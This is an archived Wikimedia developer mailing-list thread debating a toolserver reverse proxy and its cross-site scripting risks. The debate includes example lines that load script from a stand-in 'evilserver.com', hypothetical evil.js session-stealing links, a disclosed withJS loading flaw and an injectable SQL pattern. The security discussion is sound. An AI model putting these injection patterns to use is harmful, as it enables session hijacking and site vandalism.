Would it be possible to setup reverse proxying from the wikipedia domains to the toolserver. I.e: have http://en.wikipedia.org/tools/ reverse proxy the content from the toolserver http://tools.wikimedia.de/ ( http://en.wikipedia.org/tools/~dschwen/wikiminiatlas/label/en_0_0_0 would fetch the content of http://tools.wikimedia.de/~dschwen/wikiminiatlas/label/en_0_0_0)?
This would avoid the cross-domain scripting prohibitions, and allow toolserver developers to incorporate AJAX functionality into their scripts. Yeah, I know, by now most of you will have foam around their mouths from utter annoyance by that overused buzzword. But there is a real use for AJAX (there, I said it again ;-) ).
The [[Meta:WikiMiniAtlas]] uses it to display labels on the map. It currently uses an ugly iframe workaround which splits the JS code in two, one part on meta, the other part on the toolserver. With the reverse proxying the whole code could reside in the wiki, the iframe could be dropped, and GMaxwell could add Lupin's popups to the atlas (and they would not be confined to the tiny iframe). It would make life a bit simpler for toolserver developers...
Hi!
This would avoid the cross-domain scripting prohibitions, and allow toolserver developers to incorporate AJAX functionality into their scripts.
And allow each and everyone on toolserver to do XSS attacks, thus by having trust problems. Not mentioning the problem of rewrites and request pingpongs over atlantic ocean..
Best regards,
On 9/4/07, Domas Mituzas midom.lists@gmail.com wrote:
Hi!
This would avoid the cross-domain scripting prohibitions, and allow toolserver developers to incorporate AJAX functionality into their scripts.
And allow each and everyone on toolserver to do XSS attacks, thus by having trust problems.
XSS attacks are already possible by those who can edit the JS files by using the document.write('<script src=" trick.
Not mentioning the problem of rewrites and request pingpongs over atlantic ocean..
Again, this already happens.
Best regards,
Domas Mituzas -- http://dammit.lt/ -- [[user:midom]]
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org http://lists.wikimedia.org/mailman/listinfo/wikitech-l
Bryan,
XSS attacks are already possible by those who can edit the JS files by using the document.write('<script src=" trick.
That is: a) Available to sysops of particular project only b) Monitored, is in watchlists and under revision control. c) General codebase is constantly monitored for XSS problems.
Again, this already happens.
How? When?
BR,
a) Available to sysops of particular project only
No, it applies to all user scripts. I doubt that every user who is including them in their profile is doing a security audit of the JavaScript.
b) Monitored, is in watchlists and under revision control.
see a). User scripts are not in revision control (apart from the MediaWiki history).
c) General codebase is constantly monitored for XSS problems.
see a). This alredy applies to user scripts. The reverse proxy will not open any new security holes. I could already hide code which sends the session keys through embedded iframes to any server in the world in my user Javascripts, such as the WikiMiniAtlas (which is even included by default).
Hi!
No, it applies to all user scripts. I doubt that every user who is including them in their profile is doing a security audit of the JavaScript.
Only if user is including them in his profile. Other users can't include anything into user's profile. User can use greasemonkey to load any scripts they want too, we won't protect against that.
see a). User scripts are not in revision control (apart from the MediaWiki history).
MediaWiki history is revision control ;-) And I'm not talking about user scripts, I'm talking about site-wide scripts.
see a). This alredy applies to user scripts. The reverse proxy will not open any new security holes. I could already hide code which sends the session keys through embedded iframes to any server in the world in my user Javascripts, such as the WikiMiniAtlas (which is even included by default).
User javascript is user's problem. Site-wide (all-projects-wide) javascript is serious threat to site, especially giving uncontrolled unmonitored access to that.
By not seeing this, you guys confirm that this should not be enabled ;-)
BR,
On 9/4/07, Domas Mituzas midom.lists@gmail.com wrote:
By not seeing this, you guys confirm that this should not be enabled ;-)
Domas, it seems you're out of touch with the actual current behavior.
Right now anyone that can edit the site wide scripts can insert a document.write('<script src="http://evilserver.com... and the script loaded as a result of that can then have ongoing communication with the user by itself inserting more script tags, which call a a callback function with the result data.
So you've made a case for limiting control of the proxy functionality to sysops... but not more than that.
No, it applies to all user scripts. I doubt that every user who is including them in their profile is doing a security audit of the JavaScript.
Only if user is including them in his profile. Other users can't include anything into user's profile.
Any sysop can. Any sysop can also edit the site wide, or throw a script into MediaWiki ns thus making it available withjs
And if you concern is "wikipedia account integrity" you're wrong to dismiss userscripts. Some are very very popular and are used by many accounts with elevated rights, for example: http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/User:Lupin/p...
Gregory,
Domas, it seems you're out of touch with the actual current behavior.
ORLY :)
Right now anyone that can edit the site wide scripts can insert a document.write('<script src="http://evilserver.com... and the script loaded as a result of that can then have ongoing communication with the user by itself inserting more script tags, which call a a callback function with the result data.
"anyone that can edit" is: - limited to single project - elected by community - has an audit trail
please be reminded, that security consists of three holy As: - Authentication - Authorization - Audit
Though authentication to toolserver is very nice one (ssh keys, etc!), authorization has slightly too wide scope, and there's no change auditing. Sysops are authenticated via HTTP, are authorized to change single project, and all their actions are logged and monitored.
So you've made a case for limiting control of the proxy functionality to sysops... but not more than that.
You miss something.
Any sysop can. Any sysop can also edit the site wide, or throw a script into MediaWiki ns thus making it available withjs
project-wide. ltwiki sysop can't edit enwiki javascript. ltwiki toolserver user can affect enwiki.
And if you concern is "wikipedia account integrity" you're wrong to dismiss userscripts. Some are very very popular and are used by many accounts with elevated rights, for example: http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/ User:Lupin/popups.js&limit=5000&from=0
This is where I'm happy to deny any kind of cooperation in case any problems happen.
On 04/09/07, Dschwen lists@schwen.de wrote:
b) Monitored, is in watchlists and under revision control.
see a). User scripts are not in revision control (apart from the MediaWiki history).
...which means it *is* under a form of revision control.
Rob Church
On 9/4/07, Domas Mituzas midom.lists@gmail.com wrote:
Bryan,
XSS attacks are already possible by those who can edit the JS files by using the document.write('<script src=" trick.
That is: a) Available to sysops of particular project only
It would be easy enough to make the proxy functionality only work for specific URLs defined in a mediawiki message page. Tada: back to the same level of oversight and control that we already have.
Oh, and adding to Dschwen's initial point.. the code should remove any session cookie and replace it with a cookie indicating a confirmed username.
Again, this already happens.
How? When?
Any sysop can already insert scripts which call remote scripts which have ongoing communication by inserting script tags over and over again. It's kludgy but it works.
It's also possible to use an invisible iframe as a request proxy off to another domain: http://blog.monstuff.com/archives/000304.html
In terms of security profile adding a proxy wouldn't change anything.. but it would allow legitimate tool authors to avoid ugly kludges needed to work around the 'security behavior'.
Hii!
It would be easy enough to make the proxy functionality only work for specific URLs defined in a mediawiki message page. Tada: back to the same level of oversight and control that we already have.
What kind of change/revision management would those URLs have? Are copies archived/saved on toolserver for every script that gets uploaded to accessible area? :)
Oh, and adding to Dschwen's initial point.. the code should remove any session cookie and replace it with a cookie indicating a confirmed username.
It doesn't help with session hijacking - you can still get cookie values with javascript, and send xmlrequest anywhere you want.
Any sysop can already insert scripts which call remote scripts which have ongoing communication by inserting script tags over and over again. It's kludgy but it works.
Yes, it is one of current security problems, probably the global .js rights have to be moved from sysops to stewards :), but at least we can track who and when added what (revision histories!) - there's no such audit trail on toolserver.
It's also possible to use an invisible iframe as a request proxy off to another domain: http://blog.monstuff.com/archives/000304.html
You won't be able to read contents of that frame, nor get cookies, nor modify anything in frame document's DOM.
In terms of security profile adding a proxy wouldn't change anything..
Now you join the camp of ignorant! :)
but it would allow legitimate tool authors to avoid ugly kludges needed to work around the 'security behavior'.
the security behavior is to protect wikipedians.
BR
On 9/4/07, Domas Mituzas midom.lists@gmail.com wrote:
What kind of change/revision management would those URLs have? Are copies archived/saved on toolserver for every script that gets uploaded to accessible area? :)
No more or less than the zillions of pre-existing things invoked remotely via <script src= today.
It doesn't help with session hijacking - you can still get cookie values with javascript, and send xmlrequest anywhere you want.
Indeed, you can.
You can also still do this *today* no new functionality is needed to create this problem (audit trailless thingies stealing session cookies).
Yes, it is one of current security problems, probably the global .js rights have to be moved from sysops to stewards :), but at least we can track who and when added what (revision histories!) - there's no such audit trail on toolserver.
Sysops can, have, and are adding script tag calls that call scripts external to the local revision control.
It's also possible to use an invisible iframe as a request proxy off to another domain: http://blog.monstuff.com/archives/000304.html
You won't be able to read contents of that frame, nor get cookies, nor modify anything in frame document's DOM.
Sure you can: You make the code running outside of the iframe eval anything string the iframe passes to it.
In terms of security profile adding a proxy wouldn't change anything..
Now you join the camp of ignorant! :)
Hey ... I'm over here.. you're standing in front of a mirror. :)
but it would allow legitimate tool authors to avoid ugly kludges needed to work around the 'security behavior'.
the security behavior is to protect wikipedians.
Security is good. Failing to understand the current behavior and existing practices is not.
And allow each and everyone on toolserver to do XSS attacks, thus by having trust problems.
Ok, there seem to be some confusions about the security implications and the reasons for cross-site scripting limitations in the first place.
I can already devise user-JS on wikipedia which could remote control the users' browser to surf to their homebanking site in an iframe. Now if XSS were allowed I could manipulate the iframe (fill in money amounts and guessed passwords, submit forms etc.). This is NOT allowed as the wikipedia JS cannot acces pages from arbitrary different domains.That's a good thing.
Now with the reverse proxy we are not deactivating XSS entirely, we are just allowing remote controlled access to pages on one single server: the toolserver (plus we enable XHR which is very useful).
Granted, an evil user could setup another reverse proxy on the toolserver to then extend the access to other servers, but these proxied pages would appear under different domain-names (tools.wikimedia.de), so no automatic password-filling or cookies could be exploited (=no gain!). Plus it would need an opt-in user-JS component on the wiki. AND, a similar thing is already possible without the reverse proxy, by embedding a malicious toolserver iframe (not exploitable either).
I don't see how this would generate any exploitable security holes. But maybe I'm missing part of the picture?!
Hiii!
Didn't spot this email when sending my reply :)
I can already devise user-JS on wikipedia which could remote control the users' browser to surf to their homebanking site in an iframe.
I don't care about home banking. In this case the problem is wikipedia account integrity.
Now if XSS were allowed I could manipulate the iframe (fill in money amounts and guessed passwords, submit forms etc.). This is NOT allowed as the wikipedia JS cannot acces pages from arbitrary different domains.That's a good thing.
But you can fetch all user's wikipedia session details, and do nasty stuff. Like xmlrequests changing passwords, deleting pages and putting huge genitalia images on front pages. :)
Now with the reverse proxy we are not deactivating XSS entirely, we are just allowing remote controlled access to pages on one single server: the toolserver (plus we enable XHR which is very useful).
That remote controlled access provides with session data of wikipedia users to any toolserver account.
I don't see how this would generate any exploitable security holes. But maybe I'm missing part of the picture?!
Yup, you are!
But maybe I'm missing part of the picture?!
Yup, you are!
Ah, it is now dawning on me that your concern are pages on the toolserver which the user could be lured to over the reverse proxy address. Well, you are right, we can construct a potential treat from that. But I wonder whether this has enought impact to really harm wikipedia. Don't you think this would be discovered fairly quick? What about limiting the reverse proxying to a number of trustworthy users? For example I'd give Magnus Manske or Gregory Maxwell my login credentials anytime (I'd give them to me as well if I didn't already have them ;-) ).
Domas Mituzas wrote:
Now with the reverse proxy we are not deactivating XSS entirely, we are just allowing remote controlled access to pages on one single server: the toolserver (plus we enable XHR which is very useful).
That remote controlled access provides with session data of wikipedia users to any toolserver account.
That could already happen. Currently there're handy scripts on the wikimedia projects, used even by sysops, vulnerable to XSS. The peer-review is quite small, because people need to understand javascript, take X time to fully understand what is that javascript doing, and then check it for vulnerabilities. XSS are subtle. People happily give "SELECT page_content WHERE page_name = ""getParam('title') + ";"
It's not that hard to add a JS vulnerability. You only need to convince a local sysop that your tool is really nice to do X. He will blindly copy the line you provide into their monobook.js (the global one if you're lucky).
If you add set the toolserver to be non-blocked, the log is exactly the same: He who adds <script src="/tools/... What do you want to have it working? Have it pointing to svn repository? (so anything running there is versioned)
Having an JS audit would be nice too, but that's another thing (and some users may get a bit angry). If we show you X running vulnerabilities, would you accept it? (and yes, i do thing an attacker could put "huge genitalia images on front pages")
On 9/4/07, Platonides Platonides@gmail.com wrote:
People happily give "SELECT page_content WHERE page_name = ""getParam('title') + ";"
Mmmm.. PHP: Bringing you SQL injection since 1995.
(And yes, PHP is special in this case, Perl, Python, etc db APIs have a safe way to pass user data without requiring the coder to religiously pass the data through quoting functions)
[snip]
If you add set the toolserver to be non-blocked, the log is exactly the same: He who adds <script src="/tools/... What do you want to have it working? Have it pointing to svn repository? (so anything running there is versioned)
[snip]
Now thats a dandy idea for pure JS things.. but pure JS things don't need to be off-site.. they can just be tossed into the MediaWiki namespace.
The need to proxy to a backend service comes when you have something local cgi that performs a search or consults a database.
It wouldn't be hard to setup a path whos files could only be changed by pushing things through SVN... especially for software which doesn't require compilation.
This would produce a nice enough audit trail.
Gregory Maxwell wrote:
On 9/4/07, Platonides Platonides@gmail.com wrote:
People happily give "SELECT page_content WHERE page_name = ""getParam('title') + ";"
Mmmm.. PHP: Bringing you SQL injection since 1995.
(And yes, PHP is special in this case, Perl, Python, etc db APIs have a safe way to pass user data without requiring the coder to religiously pass the data through quoting functions)
They're doing the same with javaScript. Luckily Mediawiki doesn't rely on user scripts to escape SQL.
If you add set the toolserver to be non-blocked, the log is exactly the same: He who adds <script src="/tools/... What do you want to have it working? Have it pointing to svn repository? (so anything running there is versioned)
[snip]
Now thats a dandy idea for pure JS things.. but pure JS things don't need to be off-site.. they can just be tossed into the MediaWiki namespace.
The need to proxy to a backend service comes when you have something local cgi that performs a search or consults a database.
It wouldn't be hard to setup a path whos files could only be changed by pushing things through SVN... especially for software which doesn't require compilation.
This would produce a nice enough audit trail.
I wasn't thinking in JavaScripts, but the full files. :-)
I still don't see how this javascript proxy adds extra vulnerabilities. The only difference between having a proxy, is the advantage of being able to directly use an xmlhttprequest. Introducing this proxy will still only allow local sysops to add toolserver JavaScript to the wiki.
Being a sysop, what I would then is: var req=sajax_init_request(); req.open('GET', '/tools/~bryan/evil-script');. What I now do is document.write('<script src="http://tools.wikimedia.de/~bryan/evil-script"></script>'). This still executes JavaScript being out of revision control.
Bryan
On 9/4/07, Bryan Tong Minh bryan.tongminh@gmail.com wrote:
I still don't see how this javascript proxy adds extra vulnerabilities.
[snip]
It does if it's a pure proxy with no access control because I could say "Hey, Bryan load http://commons.wikimedia.org/w/api.php?tsproxy=~evil/evil.js ".. and you follow the link and evil js happily steals your session cookie and begins to replace every image with goatse.
For a proxy to present no additional security holes over what we have today it would have to limited to only work on sysop approved URLs.
I'm got the impression from Domas that what we have today isn't considered very good... but can't make a hard-security improvement on it unless we disable JS editing by sysops, which would result in a substantial loss of functionality and development resources.
It seems to me that a proxy with a access control list would actually improve security since there would be a single point to look to see what external scripts can be imported... rather than trying to track down all the places in the site JS where it's being accomplished via scrip tag injection.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Gregory Maxwell wrote:
For a proxy to present no additional security holes over what we have today it would have to limited to only work on sysop approved URLs.
I'm got the impression from Domas that what we have today isn't considered very good... but can't make a hard-security improvement on it unless we disable JS editing by sysops, which would result in a substantial loss of functionality and development resources.
It seems to me that a proxy with a access control list would actually improve security since there would be a single point to look to see what external scripts can be imported... rather than trying to track down all the places in the site JS where it's being accomplished via scrip tag injection.
*nod*
What I think I'd like to see us move a little more towards is a model like that where we've got some concept of available JS-based plugins.
That can make management, maintenance, and user-level selection a lot easier than the haphazard 'add this <script=blah> command to your secret JS page' interface we have now; and the easier it is to see what's there the easier it's going to be to keep it secure.
- -- brion vibber (brion @ wikimedia.org)
On 04/09/07, Brion Vibber brion@wikimedia.org wrote:
What I think I'd like to see us move a little more towards is a model like that where we've got some concept of available JS-based plugins.
That can make management, maintenance, and user-level selection a lot easier than the haphazard 'add this <script=blah> command to your secret JS page' interface we have now; and the easier it is to see what's there the easier it's going to be to keep it secure.
I believe Duesentrieb's excellent Gadgets plugin does quite a lot of this...
Rob Church
On 9/4/07, Rob Church robchur@gmail.com wrote:
I believe Duesentrieb's excellent Gadgets plugin does quite a lot of this...
+1
http://www.mediawiki.org/wiki/Extension:Gadgets
Great stuff....
Though it doesn't solve the issue that started this thread. The issue that started this thread is how to get tighter integration of some properly external tools such as the mapping tool Dschwen built. Right now it works okay as an iframe, but that creates some silly limitations.
There is also all sorts of development for tools targeted at established Wikimedians rather than the general public, such as Bryan's hacks on things like http://commons.wikimedia.org/wiki/Commons:FlickrSearch?withJS=MediaWiki:Flic...
Some things like WikiMiniAtlas don't make a lot of sense as an extension (as an extension it would only be a piece of JS and a daemon totally external to mediawiki).
Some things might make sense as extension, but keeping them external is useful for testing, prototyping, and early versions. Not only is their a shallower learning curve for external tools, but their is fault compartmentalization: if you misunderstand how MySQL 4 is going to handle a query the whole site doesn't go down. And of course the ability to casually hack on something as new feature requests come in ... without having to nag someone to push the updates live... is nice.
It does if it's a pure proxy with no access control because I could say "Hey, Bryan load http://commons.wikimedia.org/w/api.php?tsproxy=~evil/evil.js ".. and you follow the link and evil js happily steals your session cookie and begins to replace every image with goatse.
Then I should point out that this very thing is currently possible with this link: http://commons.wikimedia.org/wiki/Eurotunnel?withJS=User:Dschwen/evil.js%26M...
Uhm, actually this wasn't supposed to work, but the security checks on the withJS thingie are a little flaky. I'll fix this in a minute.
Dschwen wrote:
It does if it's a pure proxy with no access control because I could say "Hey, Bryan load http://commons.wikimedia.org/w/api.php?tsproxy=~evil/evil.js ".. and you follow the link and evil js happily steals your session cookie and begins to replace every image with goatse.
Then I should point out that this very thing is currently possible with this link: http://commons.wikimedia.org/wiki/Eurotunnel?withJS=User:Dschwen/evil.js%26M...
Uhm, actually this wasn't supposed to work, but the security checks on the withJS thingie are a little flaky. I'll fix this in a minute.
Seems the review process didn't work so well, Domas. Even worse, when it was published (two months ago) the publication notice included "As it's a potential XSS vector, those able please help reviewing it, to verify the code is safe." :(
Hi!
Seems the review process didn't work so well, Domas. Even worse, when it was published (two months ago) the publication notice included "As it's a potential XSS vector, those able please help reviewing it, to verify the code is safe."
Well, this serves the case of restricting javascript staging policies much more, if we fail to review :) At least we (heh, you!) had a tool for reviewing.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Dschwen wrote:
Would it be possible to setup reverse proxying from the wikipedia domains to the toolserver. I.e: have http://en.wikipedia.org/tools/ reverse proxy the content from the toolserver http://tools.wikimedia.de/ ( http://en.wikipedia.org/tools/~dschwen/wikiminiatlas/label/en_0_0_0 would fetch the content of http://tools.wikimedia.de/~dschwen/wikiminiatlas/label/en_0_0_0)?
Under NO circumstances will we ever do this, that's a serious security danger.
- -- brion vibber (brion @ wikimedia.org)
http://en.wikipedia.org/tools/~dschwen/wikiminiatlas/label/en_0_0_0 would fetch the content of http://tools.wikimedia.de/~dschwen/wikiminiatlas/label/en_0_0_0)?
Under NO circumstances will we ever do this, that's a serious security danger.
I fail to see how it would be a danger with a carefully selected set of forwards. We already have to trust the contributing admin users. Why would you categorically deny trust to another group of active developers: on the toolserver? Face it, security is ultimately built on trust in the users implementing it.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Dschwen wrote:
http://en.wikipedia.org/tools/~dschwen/wikiminiatlas/label/en_0_0_0 would fetch the content of http://tools.wikimedia.de/~dschwen/wikiminiatlas/label/en_0_0_0)?
Under NO circumstances will we ever do this, that's a serious security danger.
I fail to see how it would be a danger with a carefully selected set of forwards. We already have to trust the contributing admin users. Why would you categorically deny trust to another group of active developers: on the toolserver?
It greatly increases the vulnerability landscape, whereas I'd prefer to decrease it by tightening controls on site JavaScript.
- -- brion vibber (brion @ wikimedia.org)
Brion Vibber wrote:
Dschwen wrote:
http://en.wikipedia.org/tools/~dschwen/wikiminiatlas/label/en_0_0_0 would fetch the content of http://tools.wikimedia.de/~dschwen/wikiminiatlas/label/en_0_0_0)?
Under NO circumstances will we ever do this, that's a serious security danger.
I fail to see how it would be a danger with a carefully selected set of forwards. We already have to trust the contributing admin users. Why would you categorically deny trust to another group of active developers: on the toolserver?
It greatly increases the vulnerability landscape, whereas I'd prefer to decrease it by tightening controls on site JavaScript.
I'd like to point out in response to a private message from Greg that I'm not averse to any specific tools involving a backend on the toolserver, but just to setting up a general proxying service, which feels fundamentally unsafe to me.
I'm sorry if I sounded overly harsh or dismissive.
-- brion vibber (brion @ wikimedia.org)
wikitech-l@lists.wikimedia.org